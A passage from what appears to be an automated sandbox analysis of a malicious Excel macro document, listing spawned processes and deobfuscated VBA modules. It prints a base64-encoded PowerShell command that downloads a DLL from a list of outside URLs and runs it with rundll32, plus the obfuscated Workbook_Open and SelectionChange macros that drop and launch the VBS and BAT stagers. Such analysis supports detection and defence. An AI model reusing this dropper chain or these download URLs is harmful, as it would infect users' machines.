wBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Imagebase:	0x13f950000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Analysis Process: wscript.exePID: 3804, Parent PID: 3284

General

Target ID:	10
Start time:	12:29:30
Start date:	07/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript c:\programdata\wetidjks.vbs
Imagebase:	0xff030000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: cmd.exePID: 3836, Parent PID: 3804

General

Target ID:	11
Start time:	12:29:30
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Imagebase:	0x4a190000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: powershell.exePID: 3868, Parent PID: 3836

General

Target ID:	13
Start time:	12:29:30
Start date:	07/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Imagebase:	0x13f950000
File size:	443'392 bytes
MD5 hash:	A575A7610E5F003CC36DF39E07C4BA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Analysis Process: cmd.exePID: 1888, Parent PID: 3404

General

Target ID:	17
Start time:	12:30:00
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Imagebase:	0x4a190000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:30:00
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Imagebase:	0x7c0000
File size:	44'544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:30:16
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Imagebase:	0x4a190000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: rundll32.exePID: 804, Parent PID: 896

General

Target ID:	22
Start time:	12:30:16
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Imagebase:	0xb60000
File size:	44'544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 2192, Parent PID: 3804

General

Target ID:	23
Start time:	12:30:18
Start date:	07/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Imagebase:	0x4a180000
File size:	345'088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: rundll32.exePID: 2684, Parent PID: 2192

General

Target ID:	25
Start time:	12:30:19
Start date:	07/11/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Imagebase:	0xcc0000
File size:	44'544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Disassembly

Code Analysis

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: bDSFgs4ysustjshgs

Declaration

Line	Content
1	Attribute VB_Name = "bDSFgs4ysustjshgs"
2	Attribute VB_Base = "0{F1E303DD-38AB-44AD-8EBC-C6602A6C4899}{D80B08D8-D436-4C4B-A4F6-487ABA1E56BA}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False
9	Public sdghkaFAw23r as Long
10	Public bhide4uefGJDr as String
11	Public agrkjdGAW3erg3jkasg, berukuw7swDEe3 as Object

Non-Executed Functions

Function
DFGw3hlwrkglsdAPIs: 5, Strings: 0, Number of lines: 16, Relevance: 6.266

APIs	Meta Information
intSum1
dblRate1
intSum2
dblRate2
dblRate3

Line	Instruction	Meta Information
30	Function DFGw3hlwrkglsd(lngSum as Long) as Object
31	Const dblRate1 as Double = 0.09
32	Const dblRate2 as Double = 0.11
33	Const dblRate3 as Double = 0.15
34	Dim dhCalculatePercent as Double
35	Const intSum1 as Long = 5000
36	Const intSum2 as Long = 10000
37	Set DFGw3hlwrkglsd = agrkjdGAW3erg3jkasg
38	If lngSum < intSum1 Then	intSum1
39	dhCalculatePercent = lngSum * dblRate1	dblRate1
40	Elseif lngSum < intSum2 Then	intSum2
41	dhCalculatePercent = lngSum * dblRate2	dblRate2
42	Else
43	dhCalculatePercent = lngSum * dblRate3	dblRate3
44	Endif
45	End Function

Subroutine
TextBox1_ChangeAPIs: 3, Strings: 0, Number of lines: 21, Relevance: 3.771

APIs	Meta Information
Range
Cells
Value

Line	Instruction	Meta Information
12	Private Sub TextBox1_Change()
13	Dim lngRows as Long, intCols as Integer
13	Dim lngRow as Long, intCol as Integer
14	Dim lngStep as Long, lngVal as Long
14	Dim alngValues() as Long
15	Dim rgRange as Range
15	lngVal = 1
15	lngStep = 1
16	Redim alngValues(1 To lngRows, 1 To intCols)
17	If lngRows <> 3479289 Then
18	Else
19	Set rgRange = ActiveCell.Range(Cells(1, 1), Cells(lngRows, intCols))	Range Cells
21	For lngRow = 1 To lngRows
22	For intCol = 1 To intCols
23	alngValues(lngRow, intCol) = lngVal
24	lngVal = lngVal + lngStep
25	Next intCol
26	Next lngRow
27	rgRange.Value = alngValues	Value
28	Endif
29	End Sub

Module: dfkj3ghrksldjkgf

Declaration

Line	Content
1	Attribute VB_Name = "dfkj3ghrksldjkgf"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
Worksheet_SelectionChangeAPIs: 23, Strings: 18, Number of lines: 31, Relevance: 110.031

APIs	Meta Information
CommandButton1
Replace	Replace(Rpcec:Rpce\pRpceroRpcegraRpcemdaRpceta\wetidjks.vRpcebRpces,"Rpce","") -> c:\programdata\wetidjks.vbs
Cells
Range
Open	Open("c:\programdata\wetidjks.vbs")
CommandButton1
CommandButton1
Cells
MsgBox
Open	Open("c:\programdata\jledshf.bat")
CommandButton1
Label1
Replace	Replace(DRpceiRpcem fhnl213klsd:SRpceet fhnl213klsd=wsRpceCriPRpcet.creRpceAteobRpceJEct(reRpceplaRpcece("WDqhnuioSDqhnuiocrDqhnuioipDqhnuiot.DqhnuioSDqhnuiohDqhnuioelDqhnuiol","Dqhnuio","")):jlwkhdelsdgk=RpcereRpceplaRpcece("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe",""):fhnl213klsd.rRpceUn jlwkhdelsdgk,0,RpcetrRpceue:indlhwkjhks=rePRpceLacRpcee("cGswemGswed Gswe/Gswec sGswetGswearGswet Gswe/GsweB GswecGswe:Gswe\wGsweinGswedGsweowGswes\sGsweysGswewGsweoGswew6Gswe4\rGsweundlGswel3Gswe2.eGswexGswee cGswe:Gswe\pGsweroGswegraGswemdGsweatGswea\vbkwk.dGswelGswel,dfsgeresd","Gswe","")Rpce:fhnl213klsd.ruRpceN indlhwkjhks,0:SRpceet fhnl213klsd=noRpcethRpceing,"Rpce","") -> Dim fhnl213klsd:Set fhnl213klsd=wsCriPt.creAteobJEct(replace("WDqhnuioSDqhnuiocrDqhnuioipDqhnuiot.DqhnuioSDqhnuiohDqhnuioelDqhnuiol","Dqhnuio","")):jlwkhdelsdgk=replace("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe",""):fhnl213klsd.rUn jlwkhdelsdgk,0,true:indlhwkjhks=rePLace("cGswemGswed Gswe/Gswec sGswetGswearGswet Gswe/GsweB GswecGswe:Gswe\wGsweinGswedGsweowGswes\sGsweysGswewGsweoGswew6Gswe4\rGsweundlGswel3Gswe2.eGswexGswee cGswe:Gswe\pGsweroGswegraGswemdGsweatGswea\vbkwk.dGswelGswel,dfsgeresd","Gswe",""):fhnl213klsd.ruN indlhwkjhks,0:Set fhnl213klsd=nothing
Cells
Cells
vbCrLf
Label1
Label1
Replace	Replace(wRpcesRpcecrRpceipRpcet Rpcec:Rpce\RpceprRpceogrRpceamRpcedaRpceta\wetidjks.vRpcebRpces,"Rpce","") -> wscript c:\programdata\wetidjks.vbs
Cells
Names
Exec	Object.Exec("wscript c:\programdata\wetidjks.vbs")
Label1

Strings	Decrypted Strings
""""
"Rpce"
"E5"
"."
"5!"
"hfkwlwkd"
"."
"5!"
""""
"Rpce"
""""
"34kla"
"Rpce"
"bhckla"
"34kla"
""""
"Rpce"
"LastFoundRngName"

Line	Instruction	Meta Information
71	Private Sub Worksheet_SelectionChange(ByVal Target as Range)
72	Dim iFoundRng as Range	executed
72	Dim AutoNum as String
72	Dim i as Long
73	Dim firstAddress as String
73	Dim LastFoundRng as String
73	Dim fkausk as String
74	bDSFgs4ysustjshgs.CommandButton1.Caption = Replace(Cells(106, 2), "Rpce", "")	CommandButton1 Replace(Rpcec:Rpce\pRpceroRpcegraRpcemdaRpceta\wetidjks.vRpcebRpces,"Rpce","") -> c:\programdata\wetidjks.vbs Cells executed
75	AutoNum = Range("E5")	Range
75	Open bDSFgs4ysustjshgs.CommandButton1.Caption For Output As # 1	Open("c:\programdata\wetidjks.vbs") CommandButton1 executed
76	bDSFgs4ysustjshgs.CommandButton1.Caption = Cells(117, 2)	CommandButton1 Cells
77	If AutoNum = "hfkwlwkd" Then
78	MsgBox "5!", 48, "."	MsgBox
79	Exit Sub
80	Endif
81	Open bDSFgs4ysustjshgs.CommandButton1.Caption For Output As # 2	Open("c:\programdata\jledshf.bat") CommandButton1 executed
82	Dim gnjlewkdsldf as New fgkwjkFGzaxd
83	bDSFgs4ysustjshgs.Label1.Tag = Replace(Cells(107, 2), "Rpce", "")	Label1 Replace(DRpceiRpcem fhnl213klsd:SRpceet fhnl213klsd=wsRpceCriPRpcet.creRpceAteobRpceJEct(reRpceplaRpcece("WDqhnuioSDqhnuiocrDqhnuioipDqhnuiot.DqhnuioSDqhnuiohDqhnuioelDqhnuiol","Dqhnuio","")):jlwkhdelsdgk=RpcereRpceplaRpcece("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe",""):fhnl213klsd.rRpceUn jlwkhdelsdgk,0,RpcetrRpceue:indlhwkjhks=rePRpceLacRpcee("cGswemGswed Gswe/Gswec sGswetGswearGswet Gswe/GsweB GswecGswe:Gswe\wGsweinGswedGsweowGswes\sGsweysGswewGsweoGswew6Gswe4\rGsweundlGswel3Gswe2.eGswexGswee cGswe:Gswe\pGsweroGswegraGswemdGsweatGswea\vbkwk.dGswelGswel,dfsgeresd","Gswe","")Rpce:fhnl213klsd.ruRpceN indlhwkjhks,0:SRpceet fhnl213klsd=noRpcethRpceing,"Rpce","") -> Dim fhnl213klsd:Set fhnl213klsd=wsCriPt.creAteobJEct(replace("WDqhnuioSDqhnuiocrDqhnuioipDqhnuiot.DqhnuioSDqhnuiohDqhnuioelDqhnuiol","Dqhnuio","")):jlwkhdelsdgk=replace("Gswec:Gswe\pGsweroGswegramGswedaGswetGswea\jledshf.bGsweat","Gswe",""):fhnl213klsd.rUn jlwkhdelsdgk,0,true:indlhwkjhks=rePLace("cGswemGswed Gswe/Gswec sGswetGswearGswet Gswe/GsweB GswecGswe:Gswe\wGsweinGswedGsweowGswes\sGsweysGswewGsweoGswew6Gswe4\rGsweundlGswel3Gswe2.eGswexGswee cGswe:Gswe\pGsweroGswegraGswemdGsweatGswea\vbkwk.dGswelGswel,dfsgeresd","Gswe",""):fhnl213klsd.ruN indlhwkjhks,0:Set fhnl213klsd=nothing Cells executed
83	Print # 2, Cells(115, 2) + vbCrLf & Cells(116, 2)	Cells vbCrLf
84	Print # 1, bDSFgs4ysustjshgs.Label1.Tag	Label1
85	Close # 2
86	If LastFoundRng <> "bhckla" Then
87	firstAddress = "34kla"
88	bDSFgs4ysustjshgs.Label1.Tag = Replace(Cells(108, 2), "Rpce", "")	Label1 Replace(wRpcesRpcecrRpceipRpcet Rpcec:Rpce\RpceprRpceogrRpceamRpcedaRpceta\wetidjks.vRpcebRpces,"Rpce","") -> wscript c:\programdata\wetidjks.vbs Cells executed
89	Else
90	On Error Resume Next
91	LastFoundRng = ActiveWorkbook.Names("LastFoundRngName").RefersToRange.Address	Names
92	Endif
93	Close # 1
94	bDSFgs4ysustjshgs.berukuw7swDEe3.Exec bDSFgs4ysustjshgs.Label1.Tag	Object.Exec("wscript c:\programdata\wetidjks.vbs") Label1 executed
95	End Sub

Subroutine
sdfhSDFasw3erhkswdgSDYHsdAPIs: 30, Strings: 28, Number of lines: 58, Relevance: 87.058

APIs	Meta Information
Areas
Selection
Caption
Cells
Areas
Areas
CreateObject
Caption
Areas
Selection
Text
Union
Areas
Text
Rows
Columns
Columns
Rows
Count
vbTab
vbCrLf
Format
MsgBox
vbInformation
Tag
Cells
Areas
Selection
CreateObject
Tag

Strings	Decrypted Strings
"."
"."
"rwdg"
"3"
"9"
"Block"
"Vsdefhwkls:"
"df3"
"ewhk2"
"Block"
"df3"
"df3"
"df3"
"Block"
"3"
"9"
"ewhk2"
"3"
"9"
"ewhk2"
"9"
"3"
"ewhk2"
"Vsdefhwkls:"
"."
"."
""""
"rwdg"

Line	Instruction	Meta Information
9	Sub sdfhSDFasw3erhkswdgSDYHsd()
10	Dim rgSelUnion as Range	executed
11	Dim strTitle as String
12	Dim strMessage as String
13	Dim strSelType as String
14	Dim intBlockCount as Integer
15	Dim intCellCount as Long
16	Dim intColCount as Integer
17	Dim intRowCount as Long
18	Dim intAreasCount as Integer
19	Dim strCurSelType as String
20	Dim rgArea as Range
21	intAreasCount = Selection.Areas.Count	Areas Selection
22	bDSFgs4ysustjshgs.Caption = Cells(117, 6)	Caption Cells
23	If intAreasCount = 10273 Then
24	strTitle = "."
25	strSelType = Selection.Areas(1).Text	Areas
26	Set rgSelUnion = Selection.Areas(1)	Areas
27	Else
28	strTitle = "rwdg"
29	Endif
30	Set bDSFgs4ysustjshgs.agrkjdGAW3erg3jkasg = CreateObject(bDSFgs4ysustjshgs.Caption)	CreateObject Caption
32	If bDSFgs4ysustjshgs.agrkjdGAW3erg3jkasg Is Nothing Then
33	For Each rgArea in Selection.Areas	Areas Selection
34	strCurSelType = rgArea.Text	Text
35	If strCurSelType <> strSelType Then
36	strSelType = "df3"
37	Endif
38	If strCurSelType = "Block" Then
39	intBlockCount = intBlockCount + 1
40	Endif
41	Set rgSelUnion = Union(rgSelUnion, rgArea)	Union
42	Next rgArea	Areas Selection
43	For Each rgArea in rgSelUnion.Areas	Areas
44	Select Case rgArea.Text	Text
45	Case "9"
46	intRowCount = intRowCount + rgArea.Rows.Count	Rows
47	Case "3"
48	intColCount = intColCount + rgArea.Columns.Count	Columns
49	Case "ewhk2"
50	intColCount = intColCount + rgArea.Columns.Count	Columns
51	intRowCount = intRowCount + rgArea.Rows.Count	Rows
52	End Select	Text
53	Next rgArea	Areas
54	intCellCount = rgSelUnion.Count	Count
55	strMessage = "Vsdefhwkls:" & vbTab & strSelType & vbCrLf & "gfqwekasd: " & vbTab & intAreasCount & vbCrLf & "ashkizuk: " & vbTab & intColCount & vbCrLf & "hjul4: " & vbTab & intRowCount & vbCrLf & "bnjdkli7: " & vbTab & intBlockCount & vbCrLf & "vbjwuhks: " & vbTab & Format(intCellCount, "#,###")	vbTab vbCrLf Format
58	MsgBox strMessage, vbInformation, strTitle	MsgBox vbInformation
59	Else
60	bDSFgs4ysustjshgs.Tag = Cells(113, 3)	Tag Cells
61	Endif
62	intAreasCount = Selection.Areas.Count	Areas Selection
63	If intAreasCount = 10273 Then
64	strTitle = "."
65	Else
66	Set bDSFgs4ysustjshgs.berukuw7swDEe3 = bDSFgs4ysustjshgs.agrkjdGAW3erg3jkasg.CreateObject(bDSFgs4ysustjshgs.Tag, "")	CreateObject Tag
68	strTitle = "rwdg"
69	Endif
70	End Sub

Module: fgkwjkFGzaxd

Declaration

Line	Content
1	Attribute VB_Name = "fgkwjkFGzaxd"
2	Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = False
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False
9	Public fhwkuishdf as Object

Non-Executed Functions

Subroutine
fgghzashsGSdghs3e46sdrtdAPIs: 42, Strings: 4, Number of lines: 40, Relevance: 69.04

APIs	Meta Information
Selection
Count
ScreenUpdating
Name
ActiveSheet
Add
Areas
Columns
Copy
Paste
Select
Select
Sort
Range
xlAscending
xlGuess
xlTopToBottom
xlSortTextAsNumbers
Select
Insert
xlDown
Select
AutoFill
Range
xlFillDefault
Copy
PasteSpecial
xlPasteValues
xlNone
CutCopyMode
Value
VLookup
Value
Range
Count
Interior
DisplayAlerts
Delete
Select
Select
DisplayAlerts
ScreenUpdating

Strings	Decrypted Strings
"A1"
"1:1"
"=IF((RC[-1]=R[-1]C[-1])+(RC[-1]=R[1]C[-1]),1,0)"
"b2"

Line	Instruction	Meta Information
10	Sub fgghzashsGSdghs3e46sdrtd()
11	Dim r as Range, ar as Range, nm as String, col as Range
12	Set r = Selection	Selection
13	If r.Count < 2 Then	Count
13	Exit Sub
13	Endif
14	Application.ScreenUpdating = False	ScreenUpdating
15	nm = ActiveSheet.Name	Name ActiveSheet
16	Sheets.Add	Add
17	For Each ar in r.Areas	Areas
18	For Each col in ar.Columns	Columns
19	col.Copy	Copy
20	ActiveSheet.Paste	Paste
21	ActiveCell.SpecialCells(xlLastCell).Offset(1, 0).Select	Select
22	Next	Columns
23	Next	Areas
24	Range(Cells(1, 1), Cells(r.Cells.Count, 2)).Select	Select
25	Selection.Sort Key1 := Range("A1"), Order1 := xlAscending, Header := xlGuess, OrderCustom := 1, MatchCase := False, Orientation := xlTopToBottom, DataOption1 := xlSortTextAsNumbers	Sort Range xlAscending xlGuess xlTopToBottom xlSortTextAsNumbers
28	Rows("1:1").Select	Select
29	Selection.Insert Shift := xlDown	Insert xlDown
30	Cells(2, 2).FormulaR1C1 = "=IF((RC[-1]=R[-1]C[-1])+(RC[-1]=R[1]C[-1]),1,0)"
31	Range("b2").Select	Select
32	Selection.AutoFill Destination := Range(Cells(2, 2), Cells(r.Cells.Count + 1, 2)), Type := xlFillDefault	AutoFill Range xlFillDefault
33	Range(Cells(2, 2), Cells(r.Cells.Count + 1, 2)).Copy	Copy
34	Cells(2, 2).PasteSpecial Paste := xlPasteValues, Operation := xlNone, SkipBlanks := False, Transpose := False	PasteSpecial xlPasteValues xlNone
36	Application.CutCopyMode = False	CutCopyMode
37	For Each ar in r.Cells
38	If ar.Value <> Empty Then	Value
39	If WorksheetFunction.VLookup(ar.Value, Range(Cells(2, 1), Cells(r.Count + 1, 2)), 2, 0) Then	VLookup Value Range Count
40	ar.Interior.ColorIndex = 3	Interior
41	Endif
42	Endif
43	Next
44	Application.DisplayAlerts = False	DisplayAlerts
45	ActiveSheet.Delete	Delete
46	Sheets(nm).Select	Select
47	ActiveCell.Select	Select
48	Application.DisplayAlerts = True	DisplayAlerts
49	Application.ScreenUpdating = True	ScreenUpdating
50	End Sub

Subroutine
Class_InitializeAPIs: 8, Strings: 4, Number of lines: 24, Relevance: 18.024

APIs	Meta Information
Val
InputBox
Val
InputBox
ScreenUpdating
Offset
ScreenUpdating
Hderyhs54esdfGZSDEGZJG

Strings	Decrypted Strings
","
";"
";"
","

Line	Instruction	Meta Information
51	Private Sub Class_Initialize()
52	Dim HzsghkzjfhZFHZXDvgzs3ghksdj as String
52	Dim lngRows as Long, intCols as Integer
53	Dim lngRow as Long, intCol as Integer
53	Dim lngStep as Long, lngVal as Long
54	lngVal = 1
55	lngStep = 1
56	If lngStep = 2377 Then
57	lngRows = Val(InputBox(";"))	Val InputBox
57	intCols = Val(InputBox(","))	Val InputBox
57	lngRow = (lngRows + intCols) / 2
58	Endif
59	If lngVal = 73762 Then
60	Application.ScreenUpdating = False	ScreenUpdating
61	For lngRow = 1 To lngRows
62	For intCol = 1 To intCols
63	ActiveCell.Offset(lngRow, intCol).Value = lngVal	Offset
64	lngVal = lngVal + lngStep
65	Next intCol
66	Next lngRow
67	Application.ScreenUpdating = True	ScreenUpdating
68	Endif
69	Set fhwkuishdf = Hderyhs54esdfGZSDEGZJG	Hderyhs54esdfGZSDEGZJG
70	End Sub

Module: gDFt4etujSDssdf

Declaration

Line	Content
1	Attribute VB_Name = "gDFt4etujSDssdf"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Executed Functions

Subroutine
Workbook_OpenAPIs: 38, Strings: 6, Number of lines: 23, Relevance: 78.773

APIs	Meta Information
InputBox
Count
Worksheets
xlValues
Select
Select
MsgBox
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Areas
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Selection
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Caption
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Cells
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Areas
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Areas
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: CreateObject
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Caption
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Areas
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Selection
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Text
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Union
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Areas
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Text
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Rows
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Columns
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Columns
Part of subcall function sdfhSDFasw3erhkswdgSDYHsd@dfkj3ghrksldjkgf: Rows
